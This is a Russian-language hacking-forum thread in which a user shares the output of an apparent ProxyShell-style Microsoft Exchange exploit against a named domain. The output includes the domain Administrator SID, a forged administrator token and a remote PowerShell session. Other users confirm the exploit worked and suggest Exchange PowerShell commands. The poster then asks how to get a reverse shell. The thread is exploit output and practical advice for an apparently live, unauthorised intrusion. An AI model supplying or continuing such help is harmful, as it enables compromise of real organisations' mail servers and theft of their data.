Microsoft exchange

[killthenetwork]

Что я не так делаю?

[+] Successfully parsed SID via UserMailbox object: S-1-5-21-2017531892-57984277-3449083368-500
[+] RID Cycled: S-1-5-21-2017531892-57984277-3449083368-500
[+] Generated token for Administrator@scrito.eu - S-1-5-21-2017531892-57984277-3449083368-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQHNvdW5kdW5kdmlzaW9uLmV1VStTLTEtNS0yMS0yMDE3NTMxODkyLTU3OTg0Mjc3LTM0NDkwODMzNjgtNTAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA
PS> whoami /priv
[+] Created powershell session on scrito.eu
127.0.0.1 - - [27/Nov/2023 21:12:14] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [27/Nov/2023 21:12:14] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [27/Nov/2023 21:12:15] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [27/Nov/2023 21:12:15] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [27/Nov/2023 21:12:15] "POST /wsman HTTP/1.1" 200 -
127.0.0.1 - - [27/Nov/2023 21:12:15] "POST /wsman HTTP/1.1" 200 -
[+] PS> whoami /priv
OUTPUT:

ERROR:
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
127.0.0.1 - - [27/Nov/2023 21:12:15] "POST /wsman HTTP/1.1" 200 -

 

[kamzzzzz]

По какой-то причине тачка не может выполнить твою команду whoami, но то что она тебе отвечает говоря об этом, значит что эксп сработал, ищи другие команды для общения либо пробуй указывать полный путь до whoami
Введи команду host и посмотри на ответ, там ьудет указана версия PS, но в целом если ответит, используй другие команды

 

[FromHell]

это powershell для exchange. Там другие команды, в документациях microsoft можешь найти

 

[killthenetwork]

это powershell для exchange. Там другие команды, в документациях microsoft можешь найти

Ага, понял спасибо, сначала не догнал. А что с этим делать ? Дампить ее? Мне бы реверс шелл прокинуть как-то, может знаешь?